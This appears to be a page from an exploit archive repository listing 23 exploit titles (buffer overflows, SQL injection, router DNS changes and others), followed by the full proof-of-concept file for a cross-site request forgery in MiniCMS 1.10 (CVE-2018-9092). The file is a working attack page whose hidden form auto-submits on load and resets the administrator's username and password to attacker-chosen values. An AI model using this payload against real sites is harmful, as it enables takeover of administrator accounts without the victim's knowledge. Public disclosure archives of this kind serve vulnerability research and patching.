
23 changes to exploits/shellcodes SysGauge 4.5.18 - Local Denial of Service Systematic SitAware - NVG Denial of Service Allok AVI DivX MPEG to DVD Converter 2.6.1217 - Buffer Overflow (SEH) Allok Video Joiner 4.6.1217 - Stack-Based Buffer Overflow Allok WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Buffer Overflow Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow osTicket 1.10 - SQL Injection osTicket 1.10 - SQL Injection (PoC) Open-AuditIT Professional 2.1 - Cross-Site Request Forgery Homematic CCU2 2.29.23 - Arbitrary File Write MiniCMS 1.10 - Cross-Site Request Forgery WordPress Plugin Relevanssi 4.0.4 - Reflected Cross-Site Scripting WordPress Plugin Contact Form 7 to Database Extension 2.10.32 - CSV Injection Homematic CCU2 2.29.23 - Remote Command Execution Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection Joomla! Component AcySMS 3.5.0 - CSV Macro Injection WordPress Plugin WP Security Audit Log 3.1.1 - Sensitive Information Disclosure Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change osCommerce 2.3.4.1 - Remote Code Execution Tenda W316R Wireless Router 5.07.50 - Remote DNS Change D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router - Authentication Bypass Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit) Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC)
36 lines
No EOL
1.2 KiB
HTML
36 lines
No EOL
1.2 KiB
HTML
<--
|
||
# Exploit Title: MiniCMS 1.10 CSRF Vulnerability
|
||
# Date: 2018-03-28
|
||
# Exploit Author: zixian(me@zixian.org、zixian@5ecurity.cn)
|
||
# Vendor Homepage: https://github.com/bg5sbk/MiniCMS
|
||
# Software Link: https://github.com/bg5sbk/MiniCMS
|
||
# Version: 1.10
|
||
# CVE : CVE-2018-9092
|
||
|
||
|
||
|
||
There is a CSRF vulnerability that can change the administrator account password
|
||
After the administrator logged in, open the following page
|
||
poc:
|
||
-->
|
||
|
||
<html>
|
||
<head><meta http-equiv="Content-Type" content="text/html; charset=GB2312">
|
||
<title>test</title>
|
||
<body>
|
||
<form action="http://127.0.0.1/minicms/mc-admin/conf.php" method="post">
|
||
<input type="hidden" name="site_name" value="hack123" />
|
||
<input type="hidden" name="site_desc" value="hacktest" />
|
||
<input type="hidden" name="site_link" value="http://127.0.0.1/minicms" />
|
||
<input type="hidden" name="user_nick" value="hack" />
|
||
<input type="hidden" name="user_name" value="admin" />
|
||
<input type="hidden" name="user_pass" value="hackpass" />
|
||
<input type="hidden" name="comment_code" value="" />
|
||
<input type="hidden" name="save" value=" " />
|
||
</form>
|
||
<script>
|
||
document.forms[0].submit();
|
||
</script>
|
||
</body>
|
||
</head>
|
||
</html> |